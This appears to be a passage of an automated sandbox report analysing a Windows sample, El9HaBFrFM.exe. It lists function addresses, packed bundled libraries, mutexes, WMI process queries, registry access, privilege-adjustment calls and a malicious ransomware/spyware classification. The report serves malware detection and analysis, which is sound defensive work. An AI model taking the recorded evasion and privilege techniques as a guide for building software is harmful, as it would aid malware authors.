Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EDABA0	83_2_00007FF6D7EDABA0
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F07B24	83_2_00007FF6D7F07B24
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EE0A2C	83_2_00007FF6D7EE0A2C
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F00904	83_2_00007FF6D7F00904
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F038E8	83_2_00007FF6D7F038E8
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EE2890	83_2_00007FF6D7EE2890
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7ED8884	83_2_00007FF6D7ED8884
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F169FD	83_2_00007FF6D7F169FD
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F0FA6C	83_2_00007FF6D7F0FA6C
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F15A70	83_2_00007FF6D7F15A70
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EF67E0	83_2_00007FF6D7EF67E0
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EE17C8	83_2_00007FF6D7EE17C8
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F3AAC0	83_2_00007FF6D7F3AAC0
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F14B38	83_2_00007FF6D7F14B38
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F29B98	83_2_00007FF6D7F29B98
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EE86C4	83_2_00007FF6D7EE86C4
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F065FC	83_2_00007FF6D7F065FC
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F15C8C	83_2_00007FF6D7F15C8C
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EFF5B0	83_2_00007FF6D7EFF5B0
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EE8598	83_2_00007FF6D7EE8598
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F26D0C	83_2_00007FF6D7F26D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EDA504	83_2_00007FF6D7EDA504
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F19D74	83_2_00007FF6D7F19D74
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F21DCC	83_2_00007FF6D7F21DCC
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EFD458	83_2_00007FF6D7EFD458
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F1AE50	83_2_00007FF6D7F1AE50
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F2FE74	83_2_00007FF6D7F2FE74
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EFC3E0	83_2_00007FF6D7EFC3E0
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F1EEA4	83_2_00007FF6D7F1EEA4
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F00374	83_2_00007FF6D7F00374
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F0AF0C	83_2_00007FF6D7F0AF0C
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EE2360	83_2_00007FF6D7EE2360
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7ED42E0	83_2_00007FF6D7ED42E0
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F3AF90	83_2_00007FF6D7F3AF90
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EED2C0	83_2_00007FF6D7EED2C0
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F3DFD8	83_2_00007FF6D7F3DFD8
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F14FE8	83_2_00007FF6D7F14FE8
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F0C00C	83_2_00007FF6D7F0C00C
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EDF24C	83_2_00007FF6D7EDF24C
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EF7244	83_2_00007FF6D7EF7244
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EEE21C	83_2_00007FF6D7EEE21C
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F300F0	83_2_00007FF6D7F300F0
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F12164	83_2_00007FF6D7F12164
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EF0104	83_2_00007FF6D7EF0104
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F341CC	83_2_00007FF6D7F341CC
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F181CC	83_2_00007FF6D7F181CC
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F00074	83_2_00007FF6D7F00074
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EFC05C	83_2_00007FF6D7EFC05C
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F08040	83_2_00007FF6D7F08040
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EE3030	83_2_00007FF6D7EE3030
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F22268	83_2_00007FF6D7F22268
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F102A4	83_2_00007FF6D7F102A4
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F21314	83_2_00007FF6D7F21314
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F05F4C	83_2_00007FF6D7F05F4C
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F2832C	83_2_00007FF6D7F2832C
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7ED9EFC	83_2_00007FF6D7ED9EFC
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EDCE84	83_2_00007FF6D7EDCE84
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EE8E68	83_2_00007FF6D7EE8E68
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EDEE08	83_2_00007FF6D7EDEE08
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F15468	83_2_00007FF6D7F15468
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EE1E04	83_2_00007FF6D7EE1E04
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F00D20	83_2_00007FF6D7F00D20
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EF9D0C	83_2_00007FF6D7EF9D0C
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EDDD04	83_2_00007FF6D7EDDD04
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F0F59C	83_2_00007FF6D7F0F59C
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F2260C	83_2_00007FF6D7F2260C
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EE8C30	83_2_00007FF6D7EE8C30
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F27660	83_2_00007FF6D7F27660
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F386D4	83_2_00007FF6D7F386D4
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F12700	83_2_00007FF6D7F12700
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F0A710	83_2_00007FF6D7F0A710
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F10710	83_2_00007FF6D7F10710
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EDCB14	83_2_00007FF6D7EDCB14
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F218A8	83_2_00007FF6D7F218A8
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7ED49B8	83_2_00007FF6D7ED49B8
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EFD97C	83_2_00007FF6D7EFD97C
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F1190C	83_2_00007FF6D7F1190C
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F0D91C	83_2_00007FF6D7F0D91C

Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: String function: 00007FF6BA3A2710 appears 104 times
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: String function: 00007FFDFAB2D425 appears 48 times
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: String function: 00007FFDFAB2D33B appears 39 times
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: String function: 00007FFDFAB2D32F appears 324 times
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: String function: 00007FFDFAB2DB03 appears 45 times
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: String function: 00007FFDFAB2D341 appears 1192 times
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: String function: 00007FFDFB0C9340 appears 112 times
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: String function: 00007FFDFB0CA500 appears 122 times
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: String function: 00007FFDFAAB1325 appears 518 times
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Code function: String function: 00007FF6BA3A2910 appears 34 times
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: String function: 00007FF6D7F149F4 appears 53 times
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: String function: 00007FF6D7EE8444 appears 48 times

Source: El9HaBFrFM.exe

Static PE information: invalid certificate

Source: rar.exe.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: unicodedata.pyd.0.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS

Source: El9HaBFrFM.exe	Binary or memory string: OriginalFilename vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000000.00000003.1688964934.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000000.00000003.1684578241.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000000.00000003.1684135354.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000000.00000003.1688035385.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000000.00000003.1683960250.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000000.00000002.2266082238.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWindowsActionDialog.exej% vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000000.00000003.1684830181.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000000.00000003.1684252973.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000000.00000003.1689202299.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000000.00000003.1686972713.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamelibsslH vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000000.00000003.1684758142.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000000.00000003.1684507062.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000000.00000003.1684903916.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000000.00000003.1684380526.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_decimal.pyd. vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000000.00000003.1684986417.00000230D3DBF000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe	Binary or memory string: OriginalFilename vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000001.00000002.2255922727.00007FFDFAB79000.00000004.00000001.01000000.00000010.sdmp	Binary or memory string: OriginalFilenamelibsslH vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000001.00000002.2255326893.00007FFDFA9E2000.00000004.00000001.01000000.00000013.sdmp	Binary or memory string: OriginalFilenameunicodedata.pyd. vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000001.00000002.2259497506.00007FFDFB895000.00000004.00000001.01000000.00000004.sdmp	Binary or memory string: OriginalFilenamepython313.dll. vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000001.00000002.2260410530.00007FFE11578000.00000004.00000001.01000000.0000000C.sdmp	Binary or memory string: OriginalFilename_socket.pyd. vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000001.00000002.2261417430.00007FFE1323A000.00000004.00000001.01000000.00000008.sdmp	Binary or memory string: OriginalFilename_lzma.pyd. vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000001.00000002.2257515754.00007FFDFB08A000.00000004.00000001.01000000.0000000F.sdmp	Binary or memory string: OriginalFilenamelibcryptoH vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000001.00000002.2261683576.00007FFE13326000.00000004.00000001.01000000.00000006.sdmp	Binary or memory string: OriginalFilename_ctypes.pyd. vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000001.00000002.2260820491.00007FFE11EE8000.00000004.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilename_bz2.pyd. vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000001.00000000.1689886864.00007FF6BA3E4000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameWindowsActionDialog.exej% vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000001.00000002.2262021734.00007FFE1334A000.00000002.00000001.01000000.00000005.sdmp	Binary or memory string: OriginalFilenamevcruntime140.dllT vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000001.00000003.1710912781.0000025069359000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTGMacro.exeN vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000001.00000002.2260146620.00007FFE11553000.00000004.00000001.01000000.0000000E.sdmp	Binary or memory string: OriginalFilename_ssl.pyd. vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000001.00000002.2261009391.00007FFE130CC000.00000004.00000001.01000000.00000012.sdmp	Binary or memory string: OriginalFilename_queue.pyd. vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000001.00000002.2260635150.00007FFE11EC4000.00000004.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilename_sqlite3.pyd. vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000001.00000002.2261185050.00007FFE1320C000.00000004.00000001.01000000.0000000D.sdmp	Binary or memory string: OriginalFilenameselect.pyd. vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000001.00000002.2257951320.00007FFDFB23C000.00000004.00000001.01000000.0000000B.sdmp	Binary or memory string: OriginalFilenamesqlite3.dll0 vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000001.00000003.1711527664.0000025069462000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameTGMacro.exeN vs El9HaBFrFM.exe
Source: El9HaBFrFM.exe, 00000001.00000002.2259799869.00007FFE11513000.00000004.00000001.01000000.00000011.sdmp	Binary or memory string: OriginalFilename_hashlib.pyd. vs El9HaBFrFM.exe

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: Commandline size = 3647
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Process created: Commandline size = 3647	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: Commandline size = 3615

Source: libcrypto-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9991990186771459
Source: libssl-3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9923211348684211
Source: python313.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9994153529876473
Source: sqlite3.dll.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9975483390549273
Source: unicodedata.pyd.0.dr	Static PE information: Section: UPX1 ZLIB complexity 0.9926987474437627

Source: classification engine

Classification label: mal100.rans.troj.spyw.expl.evad.winEXE@184/327@106/38

Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe

Code function: 83_2_00007FF6D7EECAFC GetLastError,FormatMessageW,

83_2_00007FF6D7EECAFC

Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7EEEF50 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,CloseHandle,		83_2_00007FF6D7EEEF50
Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe	Code function: 83_2_00007FF6D7F1B57C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitWindowsEx,		83_2_00007FF6D7F1B57C

Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe

Code function: 83_2_00007FF6D7EF3144 GetDiskFreeSpaceExW,

83_2_00007FF6D7EF3144

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7720:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7568:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9164:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7648:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7732:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8432:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7772:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3192:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9112:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8208:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8416:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1168:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7620:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8236:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7592:120:WilError_03
Source: C:\Users\user\Desktop\El9HaBFrFM.exe	Mutant created: \Sessions\1\BaseNamedObjects\i
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7412:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\bound.exe	Mutant created: \Sessions\1\BaseNamedObjects\trksyln-TMACRO
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2504:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8016:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:9092:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8588:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8424:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7820:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8984:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5776:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8996:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7804:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4080:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3120:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7612:120:WilError_03

Source: C:\Users\user\Desktop\El9HaBFrFM.exe

File created: C:\Users\user\AppData\Local\Temp\_MEI75162

Jump to behavior

Source: El9HaBFrFM.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\tasklist.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\AppData\Local\Temp\_MEI75162\rar.exe

File read: C:\Users\desktop.ini

Source: C:\Users\user\Desktop\El9HaBFrFM.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: El9HaBFrFM.exe, 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: El9HaBFrFM.exe, El9HaBFrFM.exe, 00000001.00000002.2257648942.00007FFDFB0C1000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: El9HaBFrFM.exe

ReversingLabs: Detection: 52%

Source: El9HaBFrFM.exe	String found in binary or memory: set-addPolicy
Source: El9HaBFrFM.exe	String found in binary or memory: id-cmc-addExtensions
Source: El9HaBFrFM.exe	String found in binary or memory: --help
